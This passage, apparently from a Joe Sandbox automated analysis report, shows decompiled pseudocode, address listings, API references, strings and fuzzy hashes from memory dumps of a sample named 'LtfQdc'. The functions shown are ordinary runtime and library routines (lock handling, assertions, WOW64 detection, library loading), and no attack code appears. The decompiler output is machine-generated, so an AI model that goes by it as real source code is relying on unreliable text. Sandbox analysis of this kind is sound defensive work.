									} else {
										goto L7;
									}
								}
							}
							goto L29;
							L7:
							_t97 = _t81;
						} while (_t81 != 0xfffffffe);
						if(_t87 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L29:
			}

0x00cffab0
0x00cffab6
0x00cffab7
0x00cffaba
0x00cffabb
0x00cffabc
0x00cffac2
0x00cfface
0x00cffad0
0x00cffad6
0x00cffad6
0x00cffadf
0x00cffae1
0x00cffae4
0x00cffae7
0x00cffaef
0x00cffaf4
0x00cffaf7
0x00cffafa
0x00cffb01
0x00cffb5d
0x00cffb60
0x00cffb68
0x00cffb6f
0x00000000
0x00cffb6f
0x00000000
0x00cffb03
0x00cffb03
0x00cffb09
0x00cffb0f
0x00cffb15
0x00cffb80
0x00cffb89
0x00cffb17
0x00cffb17
0x00cffb17
0x00cffb1d
0x00cffb20
0x00cffb23
0x00cffb26
0x00cffb29
0x00cffb2e
0x00cffb44
0x00000000
0x00cffb30
0x00cffb30
0x00cffb32
0x00cffb37
0x00cffb39
0x00cffb3c
0x00cffb3e
0x00cffb54
0x00cffb74
0x00cffb74
0x00cffb78
0x00000000
0x00cffb40
0x00cffb40
0x00cffb8a
0x00cffb8d
0x00cffb93
0x00cffb95
0x00cffb9c
0x00cffba3
0x00cffba8
0x00cffbab
0x00cffbad
0x00cffbaf
0x00cffbbc
0x00cffbc2
0x00cffbc4
0x00cffbc7
0x00cffbc7
0x00cffbca
0x00cffbca
0x00cffb9c
0x00cffbd0
0x00cffbd2
0x00cffbd7
0x00cffbda
0x00cffbdd
0x00cffbe5
0x00cffbe9
0x00cffbee
0x00cffbee
0x00cffbf1
0x00cffbf5
0x00cffbf8
0x00cffc03
0x00cffc05
0x00cffc08
0x00cffc0d
0x00cffc0e
0x00cffc14
0x00cffc17
0x00cffc19
0x00cffc1b
0x00cffc1d
0x00cffc23
0x00cffc23
0x00cffc25
0x00cffc2a
0x00cffc2b
0x00cffc2c
0x00cffc2d
0x00cffc2e
0x00cffc2f
0x00cffc30
0x00cffc31
0x00cffc36
0x00cffc38
0x00cffc3a
0x00cffc3c
0x00cffc3e
0x00cffc44
0x00cffc44
0x00cffc46
0x00cffc4b
0x00cffc51
0x00cffb42
0x00000000
0x00cffb42
0x00cffb40
0x00cffb3e
0x00000000
0x00cffb47
0x00cffb47
0x00cffb49
0x00cffb50
0x00000000
0x00cffb52
0x00000000
0x00cffb50
0x00cffb15
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00CFFAE7
___except_validate_context_record.LIBVCRUNTIME ref: 00CFFAEF
_ValidateLocalCookies.LIBCMT ref: 00CFFB78
__IsNonwritableInCurrentImage.LIBCMT ref: 00CFFBA3
_ValidateLocalCookies.LIBCMT ref: 00CFFBF8

Strings

csm, xrefs: 00CFFB8D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 34492395e402e9428e518ae8f4b88a3b05c511abb33e1d8446fbb4f667b21146
Instruction ID: c5a3d095ea7cf8d0ae5d17934e8280847006aaaa1e2746b182ec7db0901f511a
Opcode Fuzzy Hash: 34492395e402e9428e518ae8f4b88a3b05c511abb33e1d8446fbb4f667b21146
Instruction Fuzzy Hash: 2241D934A0020CEFCF10DF68D890AAE7BB5FF45324F148169E9249B396D731DA56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE0510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(0000001C), ref: 00CE0538
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CE05FF

Strings

%s:%d: assertion %s failed: %s, xrefs: 00CE0643
node shouldn't be null, xrefs: 00CE062F
__x != nullptr, xrefs: 00CE0634
..\..\buildtools\third_party\libc++\trunk\include\__tree, xrefs: 00CE063E

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__tree$__x != nullptr$node shouldn't be null
API String ID: 17069307-1565806511
Opcode ID: 8f2ee930bc74c59ccfc454e450bd2fbe465c0c638f7fa8fdf2f0d4ce25badf0b
Instruction ID: 4e3d3600169bc15cc0a9cb05cb8dfc25bfe117db407a12efe9be7721f34f5817
Opcode Fuzzy Hash: 8f2ee930bc74c59ccfc454e450bd2fbe465c0c638f7fa8fdf2f0d4ce25badf0b
Instruction Fuzzy Hash: AA41C331B013948FCB10DF66C845A6ABBB1BF85700F284069E5569B391D7B0DD85CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA760 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CCA760(void* __fp0, intOrPtr* _a4) {
				void* _v16;
				signed int _v24;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				intOrPtr _t28;
				intOrPtr* _t34;
				signed int _t41;
				signed int _t43;
				signed int _t46;
				char* _t50;
				signed int _t53;
				intOrPtr* _t56;
				signed int _t58;
				signed int _t60;
				void* _t62;
				void* _t73;

				_t73 = __fp0;
				_t58 = _t60;
				_push(_t50);
				_push(_t56);
				_t62 = (_t60 & 0xfffffff0) - 0x40;
				asm("movsd xmm1, [ebp+0xc]");
				_t25 =  *0xd40014; // 0xfbddd969
				_v24 = _t25 ^ _t58;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t2 =  &_v64; // 0x24
				_v76 = _t2;
				_v72 = 0x20;
				_v68 = 0;
				_t28 =  *0xd5136c; // 0x0
				_t43 =  *0xd43e38; // 0x0
				_t49 =  *[fs:0x2c];
				if(_t28 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t43 * 4)) + 4))) {
					L11:
					L00CFDC67(_t28, 0xd5136c);
					asm("movsd xmm1, [ebp+0xc]");
					_t62 = _t62 + 4;
					if( *0xd5136c == 0xffffffff) {
						 *0xd51348 = 1;
						 *0xd5134c = 0;
						 *0xd51350 = 0;
						 *0xd51354 = 0x65;
						asm("movdqa xmm0, [0xd35f20]");
						asm("movdqu [0xd51358], xmm0");
						 *0xd51368 = 0;
						L00CFDCDD(0xd5136c);
						asm("movsd xmm1, [ebp+0xc]");
						_t62 = _t62 + 4;
					}
				}
				_t62 = _t62 - 0x10;
				_t9 =  &_v76; // 0x1c
				_v88 = _t9;
				asm("movsd [esp], xmm1");
				_v84 = 0;
				E00CDDAE2(0xd51348, _t49, _t73);
				_t41 = _v84;
				if(_t41 >= 0x7ffffff0) {
					E00D0E930(_t41, 0xd51348, _t49, _t50, _t56);
					asm("int3");
					asm("int3");
					_push(_t58);
					return GetCurrentProcessId();
				}
				_t56 = _a4;
				if(_t41 > 0xa) {
					_t53 = (_t41 | 0x0000000f) + 1;
					_push(_t53);
					_t34 = L00CFDBBC();
					_t62 = _t62 + 4;
					 *_t56 = _t34;
					 *(_t56 + 8) = _t53 | 0x80000000;
					 *(_t56 + 4) = _t41;
				} else {
					 *(_t56 + 0xb) = _t41;
					_t34 = _t56;
				}
				_t17 =  &_v64; // 0x18
				_t49 = _t17;
				_t50 = _t34 + _t41;
				_t46 = 0xd51300 | _t50 - _t49 < 0x00000000;
				if(_t34 > _t49 || _t46 != 0) {
					if(_t41 != 0) {
						L00D00C20(_t34, _t49, _t41);
					}
					 *_t50 = 0;
					 *((char*)(_v76 + _t41)) = 0;
					E00CFE643(_v76, _t41, _v24 ^ _t58, _t49, _t50, _t56);
					return _t56;
				} else {
					_push("char_traits::copy overlapped range");
					_push("__s2 < __s1 || __s2 >= __s1+__n");
					_push(0xec);
					_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\__string\\char_traits.h");
					_t28 = L00C96D4C(_t41, _t46, _t49, _t73, "%s:%d: assertion %s failed: %s");
					goto L11;
				}
			}

0x00cca760
0x00cca761
0x00cca764
0x00cca765
0x00cca769
0x00cca76c
0x00cca771
0x00cca778
0x00cca77c
0x00cca780
0x00cca786
0x00cca78c
0x00cca790
0x00cca794
0x00cca79c
0x00cca7a4
0x00cca7a9
0x00cca7af
0x00cca7bf
0x00cca884
0x00cca889
0x00cca88e
0x00cca893
0x00cca89d
0x00cca8a3
0x00cca8ad
0x00cca8b7
0x00cca8c1
0x00cca8c8
0x00cca8d0
0x00cca8d8
0x00cca8e7
0x00cca8ec
0x00cca8f1
0x00cca8f1
0x00cca89d
0x00cca7c5
0x00cca7c8
0x00cca7cc
0x00cca7d0
0x00cca7d5
0x00cca7e2
0x00cca7e7
0x00cca7f1
0x00cca8f9
0x00cca8fe
0x00cca8ff
0x00cca900
0x00cca904
0x00cca904
0x00cca7f7
0x00cca7fd
0x00cca80b
0x00cca80c
0x00cca80d
0x00cca812
0x00cca815
0x00cca81d
0x00cca820
0x00cca7ff
0x00cca7ff
0x00cca802
0x00cca802
0x00cca823
0x00cca823
0x00cca827
0x00cca82c
0x00cca831
0x00cca839
0x00cca83e
0x00cca843
0x00cca846
0x00cca84d
0x00cca857
0x00cca865
0x00cca866
0x00cca866
0x00cca86b
0x00cca870
0x00cca875
0x00cca87f
0x00000000
0x00cca87f

APIs

__Init_thread_header.LIBCMT ref: 00CCA889

Part of subcall function 00D0E930: IsProcessorFeaturePresent.KERNEL32(00000017,00CDBD91,?,00C922C9,00000003,-FFE00000,?,?,?,00CC6157,00000000), ref: 00D0E94C

Strings

..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 00CCA875
, xrefs: 00CCA794
%s:%d: assertion %s failed: %s, xrefs: 00CCA87A
char_traits::copy overlapped range, xrefs: 00CCA866
__s2 < __s1 || __s2 >= __s1+__n, xrefs: 00CCA86B

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FeatureInit_thread_headerPresentProcessor
String ID: $%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$__s2 < __s1 || __s2 >= __s1+__n$char_traits::copy overlapped range
API String ID: 3909347999-2750514336
Opcode ID: eda69f9766c651ac1a9f84b91db153c6a23f33ad383bea8285ebfc972649130e
Instruction ID: 7c49981cf981516c3eedb752ae5036b54d2890fb3773dae9d19c136a3650173f
Opcode Fuzzy Hash: eda69f9766c651ac1a9f84b91db153c6a23f33ad383bea8285ebfc972649130e
Instruction Fuzzy Hash: 164124759003849FE300DF28D895B1BB7E4FF85714F108A2DE8A54B792D7B19948CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2770 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00CC2770(void* __ebx, void* __ecx, intOrPtr _a4) {
				signed int _v16;
				signed int _v20;
				signed short _v22;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr _t26;
				signed int _t32;
				void* _t36;
				signed int _t38;
				intOrPtr* _t40;
				intOrPtr _t51;
				void* _t52;
				signed int _t53;
				void* _t60;

				_t36 = __ebx;
				_t52 = __ecx;
				_t24 =  *0xd40014; // 0xfbddd969
				_v16 = _t24 ^ _t53;
				_t26 =  *0xd46a34; // 0x0
				_t38 =  *0xd43e38; // 0x0
				_t48 =  *[fs:0x2c];
				if(_t26 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t38 * 4)) + 4))) {
					L00CFDC67(_t26, 0xd46a34);
					if( *0xd46a34 == 0xffffffff) {
						 *0xd46a30 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process2");
						L00CFDCDD(0xd46a34);
					}
				}
				_t51 = _a4;
				_t40 =  *0xd46a30; // 0x0
				if(_t40 == 0) {
					_v20 = 0;
					_t28 =  &_v20;
					__imp__IsWow64Process(_t51, _t28);
					if(_t28 != 0) {
						if(_v20 == 0) {
							 *(_t52 + 0x48) = 0;
						} else {
							 *(_t52 + 0x48) = 1;
							 *(_t52 + 0x4c) = 1;
						}
					}
					L15:
					return E00CFE643(_t28, _t36, _v16 ^ _t53, _t48, _t51, _t52);
				} else {
					_v22 = 0;
					_v24 = 0;
					 *0xd57000();
					_t48 =  &_v22;
					_push( &_v24);
					_push( &_v22);
					_push(_t51);
					if( *_t40() == 0) {
						goto L15;
					}
					_t32 = _v22 & 0x0000ffff;
					_t11 = _t32 - 0x1c0; // -448
					_t60 = _t11 - 4;
					if(_t60 > 0) {
						L9:
						if(_t32 != 0) {
							if(_t32 != 0x14c) {
								_t32 = 3;
							} else {
								_t32 = 1;
							}
						}
						L14:
						 *(_t52 + 0x48) = _t32;
						_t28 = _v24 & 0x0000ffff;
						_t48 = 2 - (0 | (_v24 & 0x0000ffff) == 0x00008664);
						_t47 =  !=  ? 2 : 0;
						 *(_t52 + 0x4c) =  !=  ? 2 : 0;
						goto L15;
					}
					asm("bt edx, ecx");
					if(_t60 >= 0) {
						goto L9;
					} else {
						_t32 = 2;
						goto L14;
					}
				}
			}

0x00cc2770
0x00cc2778
0x00cc277a
0x00cc2781
0x00cc2784
0x00cc2789
0x00cc278f
0x00cc279f
0x00cc2880
0x00cc288f
0x00cc28ac
0x00cc28b6
0x00cc28bb
0x00cc288f
0x00cc27a5
0x00cc27a8
0x00cc27b0
0x00cc27f7
0x00cc27fe
0x00cc2803
0x00cc280b
0x00cc2811
0x00cc2835
0x00cc2813
0x00cc2813
0x00cc281a
0x00cc281a
0x00cc2811
0x00cc2868
0x00cc2878
0x00cc27b2
0x00cc27b2
0x00cc27b8
0x00cc27be
0x00cc27c7
0x00cc27ca
0x00cc27cb
0x00cc27cc
0x00cc27d1
0x00000000
0x00000000
0x00cc27d7
0x00cc27db
0x00cc27e1
0x00cc27e4
0x00cc2823
0x00cc2825
0x00cc282c
0x00cc283e
0x00cc282e
0x00cc282e
0x00cc282e
0x00cc282c
0x00cc2843
0x00cc2843
0x00cc2846
0x00cc2859
0x00cc2862
0x00cc2865
0x00000000
0x00cc2865
0x00cc27eb
0x00cc27ee
0x00000000
0x00cc27f0
0x00cc27f0
0x00000000
0x00cc27f0
0x00cc27ee

APIs

IsWow64Process.KERNEL32(?,00000000), ref: 00CC2803
__Init_thread_header.LIBCMT ref: 00CC2880
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CC289A
GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 00CC28A6

Strings

IsWow64Process2, xrefs: 00CC28A0
kernel32.dll, xrefs: 00CC2895

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AddressHandleInit_thread_headerModuleProcProcessWow64
String ID: IsWow64Process2$kernel32.dll
API String ID: 3408976151-2577318745
Opcode ID: e30ccaf69a0841f668f4ea732633aa1eac6c16a4c51ffabaeb544d47df50fad6
Instruction ID: 5e08f3e95e1f4f3610a8809a3792852a192a990f13b0e9e2b4596272e7a615b5
Opcode Fuzzy Hash: e30ccaf69a0841f668f4ea732633aa1eac6c16a4c51ffabaeb544d47df50fad6
Instruction Fuzzy Hash: B431AE32A003058FEB248FA6D899F7A77B4EF45710F10442DE906D66D0E779DA84CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C9465E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00C9465E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t29;
				signed int _t31;
				void* _t33;
				intOrPtr _t37;
				signed int _t39;
				intOrPtr _t47;
				signed int _t49;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t56;

				_t56 = (_t54 & 0xfffffff8) - 0x18;
				_t52 = __ecx;
				_t49 =  *0xd40014; // 0xfbddd969
				_t50 = _t49 ^ _t53;
				_v24 = _t49 ^ _t53;
				_v28 = _a8;
				_v32 = _a4;
				__imp__AcquireSRWLockExclusive(__ecx);
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 1;
				_t29 =  *(__ecx + 0xc);
				if(_t29 == 0) {
					_t14 = _t52 + 4; // 0x34
					_v40 = _t14;
					_t31 =  *0xd43e38; // 0x0
					_t18 =  *((intOrPtr*)( *[fs:0x2c] + _t31 * 4)) + 0x90; // 0x90
					_t51 = _t18;
					while(1) {
						_t33 = E00C94758( &_v36, _t50);
						__imp__SleepConditionVariableSRW(_v40, _t52, _t33, 0);
						if(_t33 != 0) {
							goto L7;
						}
						_t34 = GetLastError();
						if(_t34 == 0x5b4) {
							_t39 = 0;
							L2:
							 *((intOrPtr*)(_t52 + 8)) =  *((intOrPtr*)(_t52 + 8)) - 1;
							__imp__ReleaseSRWLockExclusive();
							E00CFE643(_t34, _t39, _v48 ^ _t53, _t50, _t51, _t52, _t52);
							return _t39;
						}
						_push(_t34);
						L00C93BFF(3, "waiter.cc", 0x171, "SleepConditionVariableSRW failed: %lu");
						_t56 = _t56 + 0x14;
						L7:
						_t29 =  *(_t52 + 0xc);
						if(_t29 != 0) {
							goto L1;
						}
						_t37 =  *_t51;
						_t47 =  *((intOrPtr*)(_t37 + 0xb4));
						_t50 =  *(_t37 + 0xb8);
						if(( *(_t37 + 0xbc) & 0x00000001) == 0 && _t47 - _t50 >= 0x3d) {
							 *(_t37 + 0xbc) = 1;
						}
					}
				}
				L1:
				_t34 = _t29 - 1;
				 *(_t52 + 0xc) = _t29 - 1;
				_t39 = 1;
				goto L2;
			}

0x00c94667
0x00c9466a
0x00c94672
0x00c94678
0x00c9467a
0x00c9467e
0x00c94682
0x00c94687
0x00c9468d
0x00c94690
0x00c94695
0x00c946be
0x00c946c1
0x00c946c5
0x00c946d4
0x00c946d4
0x00c946da
0x00c946de
0x00c946eb
0x00c946f3
0x00000000
0x00000000
0x00c946f5
0x00c94700
0x00c94750
0x00c9469d
0x00c9469d
0x00c946a1
0x00c946ad
0x00c946bb
0x00c946bb
0x00c94702
0x00c94714
0x00c94719
0x00c9471c
0x00c9471c
0x00c94721
0x00000000
0x00000000
0x00c94727
0x00c9472f
0x00c94735
0x00c9473e
0x00c94747
0x00c94747
0x00c9473e
0x00c946da
0x00c94697
0x00c94697
0x00c94698
0x00c9469b
0x00000000

APIs

AcquireSRWLockExclusive.KERNEL32(00000030,?,?,?,?,?,?,?,00D241F3,?,00000000,00000000,00000000,00000000,?,00C94BD4), ref: 00C94687
ReleaseSRWLockExclusive.KERNEL32(00000030,?,?,?,?,?,?,?,00D241F3,?,00000000,00000000,00000000,00000000,?,00C94BD4), ref: 00C946A1
SleepConditionVariableSRW.KERNEL32(?,00000030,00000000,00000000,?,?,?,?,?,?,?,00D241F3,?,00000000,00000000,00000000), ref: 00C946EB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00D241F3,?,00000000,00000000,00000000,00000000,?,00C94BD4,00D2FDAC), ref: 00C946F5

Strings

waiter.cc, xrefs: 00C9470D
SleepConditionVariableSRW failed: %lu, xrefs: 00C94703

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionErrorLastReleaseSleepVariable
String ID: SleepConditionVariableSRW failed: %lu$waiter.cc
API String ID: 3356574640-1804019090
Opcode ID: dd2de91715b9100411ae5152b7c8c7236020f55539e30d7b541ceeda9eb4ff56
Instruction ID: cfebd409ba1562ee9c9038f3b3f3a02d315a7a1eb1cef1ce1bae66cb91175bf9
Opcode Fuzzy Hash: dd2de91715b9100411ae5152b7c8c7236020f55539e30d7b541ceeda9eb4ff56
Instruction Fuzzy Hash: 05217C306047049FDB18DF29D889FAAB7E4EB46310F04847DF96AC77A1D770AA05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D16217 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00D16217(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xd445e8 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xd28f30 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xd445e8 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xd445e8 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = L00D13CC9(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = L00D13CC9(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x00d16220
0x00d162b5
0x00d16228
0x00d1622a
0x00d16234
0x00d16239
0x00d16246
0x00d1625b
0x00d1625f
0x00d162c5
0x00d162ca
0x00d162d1
0x00d162d5
0x00d162d8
0x00d162d8
0x00d162de
0x00d162de
0x00d162c0
0x00d162c4
0x00d162c4
0x00d16261
0x00d1626a
0x00d162a3
0x00d162b0
0x00d162b2
0x00d162b2
0x00000000
0x00d162b2
0x00d16274
0x00d16279
0x00d1627e
0x00000000
0x00000000
0x00d16288
0x00d1628d
0x00d16292
0x00000000
0x00000000
0x00d16297
0x00d1629d
0x00d162a1
0x00000000
0x00000000
0x00000000
0x00d162a1
0x00d1623e
0x00000000
0x00000000
0x00000000
0x00d16244
0x00d162be
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,00D16324,?,?,00000000,?,00000003,?,00D16171,00000018,AppPolicyGetProcessTerminationMethod,00D295B8,AppPolicyGetProcessTerminationMethod,00000000), ref: 00D162D8

Strings

api-ms-, xrefs: 00D1626E
ext-ms-, xrefs: 00D16282

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 1bc0334bfee16f5485d6f429869884bb899fd65a4e657109c65d9c34a84bfd10
Instruction ID: 13e2cb50f9070e1b3bf1e0db81ff993b663d8b9c6b9723d0fd0267affe4e09a7
Opcode Fuzzy Hash: 1bc0334bfee16f5485d6f429869884bb899fd65a4e657109c65d9c34a84bfd10
Instruction Fuzzy Hash: A0219035A02620BBCB219B64FC41A9A7769EB42770F290111F945E7391DFB0EE85CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D00C Relevance: 9.2, APIs: 6, Instructions: 248
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00D1D00C(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
